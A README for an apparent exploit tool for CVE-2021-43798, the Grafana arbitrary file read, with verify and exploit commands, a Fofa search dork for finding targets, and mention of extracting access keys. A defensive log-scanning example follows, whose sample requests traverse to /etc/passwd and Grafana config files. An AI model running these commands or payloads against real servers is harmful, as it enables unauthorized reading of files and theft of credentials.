zer0yu / CVE-2021-43798

Grafana Arbitrary File Reading Vulnerability

GrafanaArbitraryFileRead

Usage

1. show info

❯ go run main.go -s                                               
[INF] VulnInfo:
{
  "Name": "Grafana Arbitrary File Read",
  "VulID": "nil",
  "Version": "1.0",
  "Author": "z3",
  "VulDate": "2021-12-07",
  "References": [
    "https://nosec.org/home/detail/4914.html"
  ],
  "AppName": "Grafana",
  "AppPowerLink": "https://grafana.com/",
  "AppVersion": "Grafana Version 8.*",
  "VulType": "Arbitrary File Read",
  "Description": "An unauthorized arbitrary file reading vulnerability exists in Grafana, which can be exploited by an attacker to read arbitrary files on the host computer without authentication.",
  "Category": "REMOTE",
  "Dork": {
    "Fofa": "app=\"Grafana\"",
    "Quake": "",
    "Zoomeye": "",
    "Shodan": ""
  }
}

2. verify

echo vulfocus.fofa.so:55628 | go run main.go -v -t 20
http://vulfocus.fofa.so:55628

3. exploit

echo http://vulfocus.fofa.so:51766 | go run main.go -m exploit -v

This implements the exploitation idea described in reference 1. To extract more information, modify the regular expression in the getAccesskey function.
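For the defending side, here is an added example (not code from this repository) of the check a log reviewer would run against web-server access logs to spot the traversal pattern behind CVE-2021-43798: it percent-decodes each request path, including double-encoded forms, and flags any ".." segment aimed at Grafana's /public/plugins/ static-asset route (the route named in Grafana's public advisory). The log lines are constructed samples.

```go
package main

import (
	"fmt"
	"net/url"
	"regexp"
	"strings"
)

// Constructed sample access-log lines (not real traffic) in common log format.
var SampleLog = []string{
	`10.0.0.5 - - [07/Dec/2021:10:00:01 +0000] "GET /public/plugins/alertlist/../../../../../../etc/passwd HTTP/1.1" 200 1234`,
	`10.0.0.6 - - [07/Dec/2021:10:00:02 +0000] "GET /public/plugins/alertlist/module.js HTTP/1.1" 200 5678`,
	`10.0.0.7 - - [07/Dec/2021:10:00:03 +0000] "GET /public/plugins/alertlist/%2e%2e%2f%2e%2e%2fconf/defaults.ini HTTP/1.1" 200 9012`,
}

var reqRe = regexp.MustCompile(`"(?:GET|HEAD|POST) (\S+) HTTP/`)

// decodeFully percent-decodes several times so double-encoded forms (%252e) are normalised too.
func decodeFully(s string) string {
	for i := 0; i < 3; i++ {
		if d, err := url.PathUnescape(s); err == nil {
			s = d
		}
	}
	return s
}

// IsTraversal reports whether a request path aims a ".." segment at the plugin asset route.
func IsTraversal(rawPath string) bool {
	p := decodeFully(rawPath)
	return strings.HasPrefix(p, "/public/plugins/") && strings.Contains(p+"/", "/../")
}

// FlagTraversal returns the client IP of every line whose request path matches.
func FlagTraversal(lines []string) []string {
	var hits []string
	for _, line := range lines {
		if m := reqRe.FindStringSubmatch(line); m != nil && IsTraversal(m[1]) {
			hits = append(hits, strings.Fields(line)[0])
		}
	}
	return hits
}

func main() {
	for _, ip := range FlagTraversal(SampleLog) {
		fmt.Println("possible CVE-2021-43798 probe from", ip)
	}
}
```

Patched Grafana versions reject these paths, so a hit on a patched host is a probe to triage, not a compromise; on an unpatched 8.x host it is a read to investigate.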

Reference

  1. Analysis of the latest Grafana arbitrary file read and an explanation of the derived issues
  2. Grafana Unauthorized arbitrary file reading vulnerability

Disclaimer

This program is for security self-inspection only; please comply with your local laws.
